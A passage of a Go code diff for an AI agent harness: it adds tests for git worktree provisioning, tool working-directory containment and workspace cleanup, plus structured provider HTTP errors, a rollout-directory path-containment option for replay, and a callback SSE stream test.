+						continue
+					}
+					// Wait for the .git file to exist inside the worktree,
+					// confirming git worktree add finished before we chmod.
+					gitFile := filepath.Join(worktreeRootDir, e.Name(), ".git")
+					if _, statErr := os.Stat(gitFile); statErr == nil {
+						target := filepath.Join(worktreeRootDir, e.Name())
+						mu.Lock()
+						chmodTarget = target
+						mu.Unlock()
+						_ = os.Chmod(target, 0o555)
+						return
+					}
+				}
+			}
+			time.Sleep(1 * time.Millisecond)
+		}
+	}()
+	t.Cleanup(func() {
+		// Restore write permission so t.TempDir() cleanup can remove the dir.
+		mu.Lock()
+		target := chmodTarget
+		mu.Unlock()
+		if target != "" {
+			_ = os.Chmod(target, 0o755)
+		}
+		<-watchDone
+	})
+
+	runner := NewRunner(
+		&staticProviderWS{result: CompletionResult{Content: "done"}},
+		NewRegistry(),
+		RunnerConfig{
+			MaxSteps: 1,
+			WorkspaceBaseOptions: WorkspaceProvisionOptions{
+				RepoPath:        repoDir,
+				WorktreeRootDir: worktreeRootDir,
+				// Non-empty ConfigTOML ensures os.WriteFile is attempted after
+				// git worktree add, giving the goroutine a window to make the
+				// directory read-only and trigger the partial-failure path.
+				ConfigTOML: "[runner]\nmax_steps = 1\n",
+			},
+		},
+	)
+
+	run, err := runner.StartRun(RunRequest{
+		Prompt:        "hello",
+		WorkspaceType: "worktree",
+	})
+	if err != nil {
+		t.Fatalf("StartRun: %v", err)
+	}
+
+	events := drainRunEventsWS(t, runner, run.ID)
+
+	// Verify the run failed (provision_failed → run.failed).
+	var gotProvisionFailed, gotRunFailed bool
+	for _, ev := range events {
+		switch ev.Type {
+		case EventWorkspaceProvisionFailed:
+			gotProvisionFailed = true
+		case EventRunFailed:
+			gotRunFailed = true
+		}
+	}
+	if !gotProvisionFailed {
+		t.Error("expected workspace.provision_failed event")
+	}
+	if !gotRunFailed {
+		t.Error("expected run.failed event")
+	}
+
+	// Give Destroy a moment to run (it's called before workspace.provision_failed
+	// is emitted in the fixed code, but just in case).
+	time.Sleep(50 * time.Millisecond)
+
+	// Assert no orphaned worktree directory remains.
+	entries, err := os.ReadDir(worktreeRootDir)
+	if err != nil {
+		t.Fatalf("ReadDir worktreeRootDir: %v", err)
+	}
+	// After restore (cleanup fn runs later), we may still have the dir, so
+	// check using git worktree list which is definitive.
+	_ = entries
+
+	// Assert no leftover git worktree entry (other than the main worktree).
+	cmd := exec.CommandContext(context.Background(), "git", "-C", repoDir, "worktree", "list", "--porcelain")
+	out, err := cmd.CombinedOutput()
+	if err != nil {
+		t.Fatalf("git worktree list: %v: %s", err, out)
+	}
+	worktreeEntries := strings.Count(string(out), "worktree ")
+	if worktreeEntries > 1 {
+		t.Errorf("orphaned git worktree entry found after partial provision failure:\n%s", string(out))
+	}
+
+	// Assert no orphan branch remains.
+	branchCmd := exec.CommandContext(context.Background(), "git", "-C", repoDir, "branch", "--list", "workspace-*")
+	branchOut, err := branchCmd.CombinedOutput()
+	if err != nil {
+		t.Fatalf("git branch --list: %v: %s", err, branchOut)
+	}
+	if strings.TrimSpace(string(branchOut)) != "" {
+		t.Errorf("orphaned git branch found after partial provision failure: %s", strings.TrimSpace(string(branchOut)))
+	}
+}
+
+// ---- Deliverable A: worktree containment ----
+
+// evalSymlinksWS resolves a path through symlinks for robust path comparison.
+// macOS t.TempDir() lives under /var/folders, a symlink to /private/var, and the
+// bash `pwd` builtin reports the logical (unresolved) cwd, so a raw string compare
+// against workspace_path can spuriously differ. Resolving both sides removes that
+// noise without weakening the assertion (both must still name the same directory).
+func evalSymlinksWS(t *testing.T, path string) string {
+	t.Helper()
+	resolved, err := filepath.EvalSymlinks(path)
+	if err != nil {
+		// Fall back to the raw path if the target no longer exists (e.g. after
+		// Destroy). The caller decides whether a missing path is acceptable.
+		return path
+	}
+	return resolved
+}
+
+// worktreeContainmentProvider issues, on its first turn, a bash tool call that
+// writes two files using paths RELATIVE to the tool's cwd:
+//   - `pwd > marker.txt` records the shell's working directory, and
+//   - `echo hi > out.txt` writes a sentinel file.
+//
+// Because relative paths resolve against the bash tool's cwd, both files must
+// land inside the provisioned worktree (not the daemon startup cwd) if tool
+// routing is wired to the workspace. The second turn terminates the run.
+func worktreeContainmentProvider() *stubProvider {
+	return &stubProvider{turns: []CompletionResult{
+		{
+			ToolCalls: []ToolCall{{
+				ID:        "call-write-marker",
+				Name:      "bash",
+				Arguments: `{"command":"pwd > marker.txt && echo hi > out.txt","timeout_seconds":30}`,
+			}},
+		},
+		{Content: "done"},
+	}}
+}
+
+// TestWorktreeContainment_ToolCwdIsWorktree (Deliverable A) proves that file/shell
+// tools in a workspace_type="worktree" run operate INSIDE the provisioned worktree,
+// not the daemon's startup cwd. A real bash tool call writes out.txt and marker.txt
+// via cwd-relative paths; the test asserts:
+//   - out.txt exists at <workspace_path>/out.txt,
+//   - out.txt does NOT exist at the daemon startup cwd, and
+//   - marker.txt (containing `pwd`) names <workspace_path>, proving the tool's cwd
+//     was the worktree.
+//
+// The worktree is destroyed on run completion (git worktree remove), so the
+// in-worktree filesystem assertions must run BEFORE the terminal event. We
+// subscribe to the live event stream and perform them the moment
+// tool.call.completed arrives — the worktree is still on disk at that point.
+func TestWorktreeContainment_ToolCwdIsWorktree(t *testing.T) {
+	t.Parallel()
+
+	repoDir := initGitRepoForWS(t)
+	worktreeRootDir := t.TempDir()
+
+	// Use a dedicated temp directory as the simulated daemon startup cwd rather
+	// than os.Getwd(). os.Getwd() returns the shared process cwd; under t.Parallel
+	// another test could coincidentally create "out.txt" there, making the negative
+	// assertion ("file must NOT appear in daemon cwd") spuriously pass or flap.
+	// A test-private temp dir guarantees isolation: no other test writes there.
+	daemonCwd := t.TempDir()
+
+	// NewDefaultRegistryWithOptions wires the real bash tool; BaseRegistryOptions
+	// (ApprovalMode empty → FullAuto in NewDefaultRegistryWithOptions) means the
+	// per-run registry the runner builds at the worktree path runs bash ungated.
+	runner := NewRunner(
+		worktreeContainmentProvider(),
+		NewDefaultRegistryWithOptions(daemonCwd, DefaultRegistryOptions{
+			ApprovalMode: ToolApprovalModeFullAuto,
+		}),
+		RunnerConfig{
+			MaxSteps:     3,
+			DefaultModel: "test-model",
+			WorkspaceBaseOptions: WorkspaceProvisionOptions{
+				RepoPath:        repoDir,
+				WorktreeRootDir: worktreeRootDir,
+			},
+		},
+	)
+
+	run, err := runner.StartRun(RunRequest{
+		Prompt:        "write files relative to cwd",
+		WorkspaceType: "worktree",
+		AllowedTools:  []string{"bash"},
+	})
+	if err != nil {
+		t.Fatalf("StartRun: %v", err)
+	}
+
+	history, stream, cancelSub, subErr := runner.Subscribe(run.ID)
+	if subErr != nil {
+		t.Fatalf("Subscribe: %v", subErr)
+	}
+	defer cancelSub()
+
+	// assertContainment runs the in-worktree filesystem checks while the worktree
+	// is still on disk (before workspace.destroyed). wsPath is the captured
+	// provisioned path. It is called exactly once, on tool.call.completed.
+	assertContainment := func(wsPath string) {
+		t.Helper()
+		if wsPath == "" {
+			t.Error("workspace.provisioned event missing non-empty workspace_path")
+			return
+		}
+
+		// out.txt must exist inside the worktree.
+		wsOut := filepath.Join(wsPath, "out.txt")
+		if _, statErr := os.Stat(wsOut); statErr != nil {
+			t.Errorf("expected out.txt inside worktree at %s: %v", wsOut, statErr)
+		}
+
+		// out.txt must NOT exist at the daemon startup cwd (no leak outside worktree).
+		daemonOut := filepath.Join(daemonCwd, "out.txt")
+		if _, statErr := os.Stat(daemonOut); statErr == nil {
+			// Remove the leaked file so we don't pollute the repo tree, then fail.
+			_ = os.Remove(daemonOut)
+			t.Errorf("out.txt leaked to daemon cwd at %s — tool cwd was not the worktree", daemonOut)
+		}
+
+		// marker.txt's contents (the bash `pwd`) must name the worktree path.
+		markerBytes, readErr := os.ReadFile(filepath.Join(wsPath, "marker.txt"))
+		if readErr != nil {
+			t.Errorf("read marker.txt inside worktree: %v", readErr)
+			return
+		}
+		markerPath := strings.TrimSpace(string(markerBytes))
+		if evalSymlinksWS(t, markerPath) != evalSymlinksWS(t, wsPath) {
+			t.Errorf("bash pwd = %q (resolved %q), want worktree %q (resolved %q) — tool cwd was not the worktree",
+				markerPath, evalSymlinksWS(t, markerPath), wsPath, evalSymlinksWS(t, wsPath))
+		}
+	}
+
+	var (
+		wsPath         string
+		gotProvisioned bool
+		gotToolDone    bool
+		gotCompleted   bool
+	)
+	process := func(ev Event) {
+		switch ev.Type {
+		case EventWorkspaceProvisioned:
+			wsPath, _ = ev.Payload["workspace_path"].(string)
+			gotProvisioned = true
+		case EventToolCallCompleted:
+			// Run filesystem assertions while the worktree still exists.
+			if !gotToolDone {
+				gotToolDone = true
+				assertContainment(wsPath)
+			}
+		case EventRunCompleted:
+			gotCompleted = true
+		}
+	}
+
+	for _, ev := range history {
+		process(ev)
+	}
+
+	deadline := time.After(15 * time.Second)
+	for !gotCompleted {
+		select {
+		case ev, ok := <-stream:
+			if !ok {
+				t.Fatal("event stream closed before run.completed")
+			}
+			process(ev)
+			if IsTerminalEvent(ev.Type) && ev.Type != EventRunCompleted {
+				t.Fatalf("run reached non-success terminal %s; events so far provisioned=%v toolDone=%v",
+					ev.Type, gotProvisioned, gotToolDone)
+			}
+		case <-deadline:
+			t.Fatal("timed out waiting for run.completed")
+		}
+	}
+
+	if !gotProvisioned {
+		t.Error("expected workspace.provisioned event")
+	}
+	if !gotToolDone {
+		t.Error("expected tool.call.completed event (bash never ran)")
+	}
+
+	if err := runner.Shutdown(context.Background()); err != nil {
+		t.Fatalf("Shutdown: %v", err)
+	}
+}
+
+// ---- Deliverable B: full workspace lifecycle across success / failure / cancel ----
+
+// eventTypesWS returns the ordered list of event types, for diagnostics.
+func eventTypesWS(events []Event) []EventType {
+	types := make([]EventType, len(events))
+	for i, ev := range events {
+		types[i] = ev.Type
+	}
+	return types
+}
+
+// indexOfEventWS returns the index of the first event of the given type, or -1.
+func indexOfEventWS(events []Event, t EventType) int {
+	for i, ev := range events {
+		if ev.Type == t {
+			return i
+		}
+	}
+	return -1
+}
+
+// assertNoWorktreeOrphanWS asserts that the repo at repoDir has no extra git
+// worktree entry (beyond the main checkout) and no leftover workspace-* branch.
+func assertNoWorktreeOrphanWS(t *testing.T, repoDir string) {
+	t.Helper()
+
+	listCmd := exec.CommandContext(context.Background(), "git", "-C", repoDir, "worktree", "list", "--porcelain")
+	out, err := listCmd.CombinedOutput()
+	if err != nil {
+		t.Fatalf("git worktree list: %v: %s", err, out)
+	}
+	if n := strings.Count(string(out), "worktree "); n > 1 {
+		t.Errorf("orphaned git worktree entry remains:\n%s", string(out))
+	}
+
+	branchCmd := exec.CommandContext(context.Background(), "git", "-C", repoDir, "branch", "--list", "workspace-*")
+	branchOut, err := branchCmd.CombinedOutput()
+	if err != nil {
+		t.Fatalf("git branch --list: %v: %s", err, branchOut)
+	}
+	if strings.TrimSpace(string(branchOut)) != "" {
+		t.Errorf("orphaned workspace-* branch remains: %s", strings.TrimSpace(string(branchOut)))
+	}
+}
+
+// TestWorkspaceLifecycle_Success (Deliverable B, scenario 1) verifies that a
+// normal worktree run emits workspace.provisioned and then, after the run
+// completes, workspace.destroyed — and that cleanup leaves no orphan worktree
+// or branch behind.
+func TestWorkspaceLifecycle_Success(t *testing.T) {
+	t.Parallel()
+
+	repoDir := initGitRepoForWS(t)
+	worktreeRootDir := t.TempDir()
+
+	runner := NewRunner(
+		&staticProviderWS{result: CompletionResult{Content: "done"}},
+		NewRegistry(),
+		RunnerConfig{
+			MaxSteps:     1,
+			DefaultModel: "test-model",
+			WorkspaceBaseOptions: WorkspaceProvisionOptions{
+				RepoPath:        repoDir,
+				WorktreeRootDir: worktreeRootDir,
+			},
+		},
+	)
+
+	run, err := runner.StartRun(RunRequest{
+		Prompt:        "hello",
+		WorkspaceType: "worktree",
+	})
+	if err != nil {
+		t.Fatalf("StartRun: %v", err)
+	}
+
+	events := drainRunEventsWS(t, runner, run.ID)
+
+	provIdx := indexOfEventWS(events, EventWorkspaceProvisioned)
+	destIdx := indexOfEventWS(events, EventWorkspaceDestroyed)
+	complIdx := indexOfEventWS(events, EventRunCompleted)
+
+	if provIdx < 0 {
+		t.Fatalf("expected workspace.provisioned; events=%v", eventTypesWS(events))
+	}
+	if destIdx < 0 {
+		t.Fatalf("expected workspace.destroyed on success; events=%v", eventTypesWS(events))
+	}
+	if complIdx < 0 {
+		t.Fatalf("expected run.completed; events=%v", eventTypesWS(events))
+	}
+	if !(provIdx < destIdx) {
+		t.Errorf("workspace.provisioned (%d) must precede workspace.destroyed (%d)", provIdx, destIdx)
+	}
+	if !(destIdx < complIdx) {
+		t.Errorf("workspace.destroyed (%d) must precede run.completed (%d)", destIdx, complIdx)
+	}
+
+	assertNoWorktreeOrphanWS(t, repoDir)
+}
+
+// TestWorkspaceLifecycle_ProvisionFailure (Deliverable B, scenario 2) verifies
+// that a run whose provisioning fails emits workspace.provision_failed, fails the
+// run, and leaves no orphan worktree/branch.
+//
+// Failure is induced deterministically by placing a regular file at the path that
+// WorktreeRootDir resolves to. os.MkdirAll fails immediately ("not a directory")
+// before git worktree add is ever invoked, so there is no timing race and no
+// partial worktree to clean up. The runner's event contract (provision_failed →
+// run.failed, no workspace.provisioned) is what this test exercises; the partial-
+// provision + Destroy cleanup path is covered by TestWorktreePartialProvisionFailure_NoOrphan.
+func TestWorkspaceLifecycle_ProvisionFailure(t *testing.T) {
+	t.Parallel()
+
+	repoDir := initGitRepoForWS(t)
+
+	// Create a regular file where WorktreeRootDir would be.  os.MkdirAll returns
+	// "not a directory" when any path component is a plain file, so Provision
+	// fails immediately, deterministically, without any goroutine racing.
+	base := t.TempDir()
+	blockerFile := filepath.Join(base, "blocker")
+	if err := os.WriteFile(blockerFile, []byte("block"), 0o644); err != nil {
+		t.Fatalf("create blocker file: %v", err)
+	}
+	// WorktreeRootDir points inside the regular file — MkdirAll always fails here.
+	worktreeRootDir := filepath.Join(blockerFile, "nested")
+
+	runner := NewRunner(
+		&staticProviderWS{result: CompletionResult{Content: "done"}},
+		NewRegistry(),
+		RunnerConfig{
+			MaxSteps: 1,
+			WorkspaceBaseOptions: WorkspaceProvisionOptions{
+				RepoPath:        repoDir,
+				WorktreeRootDir: worktreeRootDir,
+				ConfigTOML:      "[runner]\nmax_steps = 1\n",
+			},
+		},
+	)
+
+	run, err := runner.StartRun(RunRequest{
+		Prompt:        "hello",
+		WorkspaceType: "worktree",
+	})
+	if err != nil {
+		t.Fatalf("StartRun: %v", err)
+	}
+
+	events := drainRunEventsWS(t, runner, run.ID)
+
+	if indexOfEventWS(events, EventWorkspaceProvisionFailed) < 0 {
+		t.Errorf("expected workspace.provision_failed; events=%v", eventTypesWS(events))
+	}
+	if indexOfEventWS(events, EventRunFailed) < 0 {
+		t.Errorf("expected run.failed; events=%v", eventTypesWS(events))
+	}
+	// A failed provisioning must never report a successful provisioned/destroyed
+	// pair — provisioning never reached the success path.
+	if indexOfEventWS(events, EventWorkspaceProvisioned) >= 0 {
+		t.Errorf("unexpected workspace.provisioned on a provision failure; events=%v", eventTypesWS(events))
+	}
+
+	// No git worktree was created, so no orphan can remain.
+	assertNoWorktreeOrphanWS(t, repoDir)
+}
+
+// hangingBashWorktreeProvider returns a bash tool call that sleeps far longer
+// than the test budget on its first turn, then blocks until the run context is
+// cancelled. It lets the test cancel a worktree run mid-tool-execution.
+type hangingBashWorktreeProvider struct {
+	mu        sync.Mutex
+	calls     int
+	firstCall chan struct{}
+}
+
+func newHangingBashWorktreeProvider() *hangingBashWorktreeProvider {
+	return &hangingBashWorktreeProvider{firstCall: make(chan struct{})}
+}
+
+func (p *hangingBashWorktreeProvider) Complete(ctx context.Context, _ CompletionRequest) (CompletionResult, error) {
+	p.mu.Lock()
+	idx := p.calls
+	p.calls++
+	p.mu.Unlock()
+
+	if idx == 0 {
+		select {
+		case <-p.firstCall:
+		default:
+			close(p.firstCall)
+		}
+		return CompletionResult{
+			ToolCalls: []ToolCall{{
+				ID:        "call-hang",
+				Name:      "bash",
+				Arguments: `{"command":"sleep 30","timeout_seconds":60}`,
+			}},
+		}, nil
+	}
+	<-ctx.Done()
+	return CompletionResult{}, ctx.Err()
+}
+
+// TestWorkspaceLifecycle_CancelMidFlight (Deliverable B, scenario 3) verifies
+// that a worktree run cancelled while a tool is executing still cleans up its
+// workspace: workspace.destroyed is emitted, the run reaches RunStatusCancelled,
+// and no orphan worktree/branch remains.
+func TestWorkspaceLifecycle_CancelMidFlight(t *testing.T) {
+	t.Parallel()
+
+	repoDir := initGitRepoForWS(t)
+	worktreeRootDir := t.TempDir()
+
+	prov := newHangingBashWorktreeProvider()
+
+	runner := NewRunner(
+		prov,
+		NewDefaultRegistryWithOptions(t.TempDir(), DefaultRegistryOptions{
+			ApprovalMode: ToolApprovalModeFullAuto,
+		}),
+		RunnerConfig{
+			MaxSteps:     5,
+			DefaultModel: "test-model",
+			WorkspaceBaseOptions: WorkspaceProvisionOptions{
+				RepoPath:        repoDir,
+				WorktreeRootDir: worktreeRootDir,
+			},
+		},
+	)
+
+	run, err := runner.StartRun(RunRequest{
+		Prompt:        "run a long sleep in the worktree",
+		WorkspaceType: "worktree",
+		AllowedTools:  []string{"bash"},
+	})
+	if err != nil {
+		t.Fatalf("StartRun: %v", err)
+	}
+
+	history, stream, cancelSub, subErr := runner.Subscribe(run.ID)
+	if subErr != nil {
+		t.Fatalf("Subscribe: %v", subErr)
+	}
+	defer cancelSub()
+
+	toolStarted := make(chan struct{})
+	terminal := make(chan struct{})
+	closeOnce := func(ch chan struct{}) {
+		select {
+		case <-ch:
+		default:
+			close(ch)
+		}
+	}
+	inspect := func(ev Event) {
+		if ev.Type == EventToolCallStarted {
+			closeOnce(toolStarted)
+		}
+		if IsTerminalEvent(ev.Type) {
+			closeOnce(terminal)
+		}
+	}
+	for _, ev := range history {
+		inspect(ev)
+	}
+	go func() {
+		for {
+			ev, ok := <-stream
+			if !ok {
+				closeOnce(terminal)
+				return
+			}
+			inspect(ev)
+			if IsTerminalEvent(ev.Type) {
+				closeOnce(terminal)
+				return
+			}
+		}
+	}()
+
+	// Wait until the bash tool is actually executing inside the worktree.
+	select {
+	case <-toolStarted:
+	case <-time.After(10 * time.Second):
+		t.Fatal("timed out waiting for tool.call.started (bash never started in worktree)")
+	}
+
+	// Cancel mid-flight; the sleep must be killed (run terminates well under 30s).
+	if err := runner.CancelRun(run.ID); err != nil {
+		t.Fatalf("CancelRun: %v", err)
+	}
+
+	select {
+	case <-terminal:
+	case <-time.After(10 * time.Second):
+		state, _ := runner.GetRun(run.ID)
+		t.Fatalf("timed out waiting for terminal event after cancel; last status: %q", state.Status)
+	}
+
+	// The run must be cancelled, not completed/failed.
+	state, ok := runner.GetRun(run.ID)
+	if !ok {
+		t.Fatal("run missing from store after cancel")
+	}
+	if state.Status != RunStatusCancelled {
+		t.Errorf("status = %q, want %q", state.Status, RunStatusCancelled)
+	}
+
+	// Collect the full event history and assert workspace cleanup happened.
+	full := drainRunEventsWS(t, runner, run.ID)
+	provIdx := indexOfEventWS(full, EventWorkspaceProvisioned)
+	destIdx := indexOfEventWS(full, EventWorkspaceDestroyed)
+	cancelIdx := indexOfEventWS(full, EventRunCancelled)
+
+	if provIdx < 0 {
+		t.Fatalf("expected workspace.provisioned; events=%v", eventTypesWS(full))
+	}
+	if destIdx < 0 {
+		t.Fatalf("expected workspace.destroyed after cancel; events=%v", eventTypesWS(full))
+	}
+	if cancelIdx < 0 {
+		t.Fatalf("expected run.cancelled; events=%v", eventTypesWS(full))
+	}
+	if !(destIdx < cancelIdx) {
+		t.Errorf("workspace.destroyed (%d) must precede run.cancelled (%d)", destIdx, cancelIdx)
+	}
+
+	// No orphan worktree directory or branch may remain after cancel cleanup.
+	assertNoWorktreeOrphanWS(t, repoDir)
+
+	if err := runner.Shutdown(context.Background()); err != nil {
+		t.Fatalf("Shutdown: %v", err)
 	}
 }

--- a/internal/provider/anthropic/client.go
+++ b/internal/provider/anthropic/client.go
@@ -125,7 +125,11 @@ func (c *Client) Complete(ctx context.Context, req harness.CompletionRequest) (h
 			if readErr != nil {
 				return harness.CompletionResult{}, fmt.Errorf("read error response body: %w", readErr)
 			}
-			return harness.CompletionResult{}, fmt.Errorf("anthropic request failed (%d): %s", httpRes.StatusCode, strings.TrimSpace(string(responseBody)))
+			return harness.CompletionResult{}, &harness.ProviderHTTPError{
+				Provider:   "anthropic",
+				StatusCode: httpRes.StatusCode,
+				Body:       strings.TrimSpace(string(responseBody)),
+			}
 		}
 		return c.decodeStreamingResponse(model, httpRes.Body, req.Stream)
 	}
@@ -136,7 +140,11 @@ func (c *Client) Complete(ctx context.Context, req harness.CompletionRequest) (h
 	}
 
 	if httpRes.StatusCode >= 300 {
-		return harness.CompletionResult{}, fmt.Errorf("anthropic request failed (%d): %s", httpRes.StatusCode, strings.TrimSpace(string(responseBody)))
+		return harness.CompletionResult{}, &harness.ProviderHTTPError{
+			Provider:   "anthropic",
+			StatusCode: httpRes.StatusCode,
+			Body:       strings.TrimSpace(string(responseBody)),
+		}
 	}
 
 	return c.decodeResponse(model, responseBody)

--- a/internal/provider/openai/client.go
+++ b/internal/provider/openai/client.go
@@ -187,7 +187,11 @@ func (c *Client) Complete(ctx context.Context, req harness.CompletionRequest) (h
 			if readErr != nil {
 				return harness.CompletionResult{}, fmt.Errorf("read error response body: %w", readErr)
 			}
-			return harness.CompletionResult{}, fmt.Errorf("openai request failed (%d): %s", httpRes.StatusCode, strings.TrimSpace(string(responseBody)))
+			return harness.CompletionResult{}, &harness.ProviderHTTPError{
+				Provider:   "openai",
+				StatusCode: httpRes.StatusCode,
+				Body:       strings.TrimSpace(string(responseBody)),
+			}
 		}
 		// Wrap the stream function to capture TTFT timing.
 		var ttftMs int64
@@ -215,7 +219,11 @@ func (c *Client) Complete(ctx context.Context, req harness.CompletionRequest) (h
 	}
 
 	if httpRes.StatusCode >= 300 {
-		return harness.CompletionResult{}, fmt.Errorf("openai request failed (%d): %s", httpRes.StatusCode, strings.TrimSpace(string(responseBody)))
+		return harness.CompletionResult{}, &harness.ProviderHTTPError{
+			Provider:   "openai",
+			StatusCode: httpRes.StatusCode,
+			Body:       strings.TrimSpace(string(responseBody)),
+		}
 	}
 
 	result, err := c.decodeCompletionResponse(model, responseBody)

--- a/internal/server/http.go
+++ b/internal/server/http.go
@@ -106,6 +106,17 @@ type ServerOptions struct {
 	// LinearAdapter is an optional Linear webhook adapter for POST /v1/webhooks/linear.
 	// When nil, the endpoint returns 401 for all requests.
 	LinearAdapter *linearadapter.LinearAdapter
+	// RolloutDir is the configured root directory for JSONL rollout files. When
+	// set (and auth is enabled), POST /v1/runs/replay enforces two-part safety:
+	//  1. Read-safety containment: the caller-supplied rollout_path must resolve
+	//     (after symlink evaluation) to a location under RolloutDir, preventing
+	//     path traversal and arbitrary file reads.
+	//  2. Tenant ownership: the loaded rollout's owning tenant (read from the
+	//     run.started event's tenant_id field) must match the caller's
+	//     authenticated tenant — verified from rollout CONTENT, not by confining
+	//     to a per-tenant subdirectory.
+	// When empty (or auth disabled), replay path handling is unrestricted (legacy).
+	RolloutDir string
 }
 
 // NewWithOptions creates an HTTP handler with the full set of optional dependencies.
@@ -141,6 +152,7 @@ func NewWithOptions(opts ServerOptions) http.Handler {
 		githubAdapter:     opts.GitHubAdapter,
 		slackAdapter:      opts.SlackAdapter,
 		linearAdapter:     opts.LinearAdapter,
+		rolloutDir:        opts.RolloutDir,
 	}
 	// If runner config has an approval broker, use it as default when none
 	// is explicitly supplied in ServerOptions.
@@ -265,7 +277,7 @@ type Server struct {
 	todos deferred.TodoManager
 
 	// Recipe listing (issue #147)
-	recipes   []recipe.Recipe
+	recipes         []recipe.Recipe
 	workflows       workflowManager
 	scriptWorkflows scriptWorkflowManager
 	networks        networkManager
@@ -313,6 +325,13 @@ type Server struct {
 	// linearAdapter converts Linear webhook requests into trigger envelopes (issue #413).
 	// When nil, POST /v1/webhooks/linear returns 401.
 	linearAdapter *linearadapter.LinearAdapter
+
+	// rolloutDir is the configured root directory for JSONL rollout files. When
+	// set (and auth is enabled), POST /v1/runs/replay enforces read-safety
+	// containment (rollout_path must resolve under this dir after symlink
+	// evaluation) and content-based tenant ownership verification (owning
+	// tenant_id in the rollout must match the caller's authenticated tenant).
+	rolloutDir string
 }
 
 func (s *Server) handleHealth(w http.ResponseWriter, _ *http.Request) {

--- a/internal/server/http_callback_sse_test.go
+++ b/internal/server/http_callback_sse_test.go
@@ -1,0 +1,232 @@
+package server
+
+// http_callback_sse_test.go — T8: prove that callback lifecycle events are
+// observable on the HTTP SSE run stream (deliverable B), using the P2 runner
+// bridge (harness.CallbackEventBridge / Runner.NewCallbackManager).
+//
+// What is genuinely observable, and what is NOT:
+//
+//   - callback.scheduled is emitted SYNCHRONOUSLY while the agent's
+//     set_delayed_callback tool call executes — i.e. DURING the originating run,
+//     which is still live. The bridge resolves the live run by conversation ID
+//     and emits the event on that run's stream, so it is observable on
+//     GET /v1/runs/{id}/events. This test asserts exactly that.
+//   - callback.fired is asserted NOWHERE here: it occurs after the timer elapses
+//     (minimum 5s), by which point the originating run has long since sealed its
+//     event stream. There is no open SSE stream to deliver it to. Asserting it on
+//     a sealed stream would be dishonest, so this test does not.
+//
+// Design notes:
+//   - package server (in-package) so it may import internal/fakeprovider; that
+//     package only imports internal/harness, so there is no import cycle with the
+//     server package.
+//   - The run's event history is retained and replayed when a subscriber connects
+//     (see Runner.Subscribe). callback.scheduled is therefore observable on the
+//     /events stream regardless of whether the HTTP subscriber connects before or
+//     after the tool fires it — making the assertion deterministic rather than
+//     racing the run loop. The event still travels the real live-stream handler
+//     (handleRunEvents), which is the deliverable under test.
+
+import (
+	"bufio"
+	"bytes"
+	"context"
+	"encoding/json"
+	"net/http"
+	"net/http/httptest"
+	"strings"
+	"testing"
+	"time"
+
+	"go-agent-harness/internal/fakeprovider"
+	"go-agent-harness/internal/harness"
+	htools "go-agent-harness/internal/harness/tools"
+	"go-agent-harness/internal/harness/tools/deferred"
+)
+
+// sseCallbackEvent is a minimally-typed view of an SSE-delivered harness.Event
+// frame for the callback assertions in this file.
+type sseCallbackEvent struct {
+	Type    string         `json:"type"`
+	RunID   string         `json:"run_id"`
+	Payload map[string]any `json:"payload"`
+}
+
+// newCallbackRunner builds a Runner whose registry contains the
+// set_delayed_callback tool, wired to a CallbackManager whose lifecycle events
+// are bridged onto the originating run's SSE stream. The CallbackManager is
+// returned so the test can Shutdown it (stopping any pending timers) on cleanup.
+func newCallbackRunner(t *testing.T, prov harness.Provider) (*harness.Runner, *htools.CallbackManager) {
+	t.Helper()
+
+	// The bridge must be bound to the Runner, but the Runner needs the registry
+	// (which needs the manager which needs the bridge) — the same chicken-and-egg
+	// the production wiring solves. Construct the bridge unbound, build the
+	// manager with it as the event sink, register the tool, build the Runner,
+	// then bind.
+	bridge := harness.NewCallbackEventBridge()
+
+	// noopStarter satisfies tools.RunStarter. callback.scheduled (the event under
+	// test) is emitted by Set BEFORE the timer ever fires, so StartRun is never
+	// reached in this test; a no-op keeps the manager honest without spawning
+	// follow-up runs.
+	mgr := htools.NewCallbackManager(noopRunStarter{}, htools.WithEventSink(bridge))
+
+	registry := harness.NewRegistry()
+	tool := deferred.SetDelayedCallbackTool(mgr)
+	if err := registry.Register(harness.ToolDefinition{
+		Name:        tool.Definition.Name,
+		Description: tool.Definition.Description,
+		Parameters:  tool.Definition.Parameters,
+		Mutating:    tool.Definition.Mutating,
+	}, harness.ToolHandler(tool.Handler)); err != nil {
+		t.Fatalf("register set_delayed_callback: %v", err)
+	}
+
+	runner := harness.NewRunner(prov, registry, harness.RunnerConfig{
+		DefaultModel: "test-model",
+		MaxSteps:     5,
+	})
+	bridge.BindRunner(runner)
+
+	t.Cleanup(func() {
+		mgr.Shutdown()
+		runner.Shutdown(context.Background())
+	})
+
+	return runner, mgr
+}
+
+type noopRunStarter struct{}
+
+func (noopRunStarter) StartRun(_, _, _, _ string) error { return nil }
+
+// TestCallbackScheduledOnRunSSEStream proves callback.scheduled appears on the
+// originating run's live SSE stream with the expected payload when the agent
+// calls set_delayed_callback during the run.
+func TestCallbackScheduledOnRunSSEStream(t *testing.T) {
+	t.Parallel()
+
+	const callbackPrompt = "check the build status"
+
+	// Turn 1: the agent issues a set_delayed_callback tool call.
+	// Turn 2: a plain content turn so the run completes cleanly.
+	prov := fakeprovider.New([]fakeprovider.Turn{
+		{
+			ToolCalls: []harness.ToolCall{{
+				ID:        "call-cb-1",
+				Name:      "set_delayed_callback",
+				Arguments: `{"delay":"30s","prompt":"` + callbackPrompt + `"}`,
+			}},
+		},
+		{Content: "scheduled the callback"},
+	})
+
+	runner, _ := newCallbackRunner(t, prov)
+
+	handler := New(runner)
+	ts := httptest.NewServer(handler)
+	defer ts.Close()
+
+	// Start the run.
+	res, err := http.Post(ts.URL+"/v1/runs", "application/json",
+		bytes.NewBufferString(`{"prompt":"please schedule a callback"}`))
+	if err != nil {
+		t.Fatalf("start run: %v", err)
+	}
+	defer res.Body.Close()
+	if res.StatusCode != http.StatusAccepted {
+		t.Fatalf("start run: expected 202, got %d", res.StatusCode)
+	}
+
+	var created struct {
+		RunID string `json:"run_id"`
+	}
+	if err := json.NewDecoder(res.Body).Decode(&created); err != nil {
+		t.Fatalf("decode start response: %v", err)
+	}
+	if created.RunID == "" {
+		t.Fatal("start run: empty run_id")
+	}
+
+	// Open the live SSE event stream for the run and read callback.scheduled.
+	got := readForCallbackScheduled(t, ts.URL, created.RunID)
+
+	// Assert the scheduled event carries the expected payload.
+	if got.RunID != created.RunID {
+		t.Errorf("callback.scheduled run_id = %q, want %q", got.RunID, created.RunID)
+	}
+	// The auto-assigned conversation ID equals the run ID when none was supplied.
+	if conv, _ := got.Payload["conversation_id"].(string); conv != created.RunID {
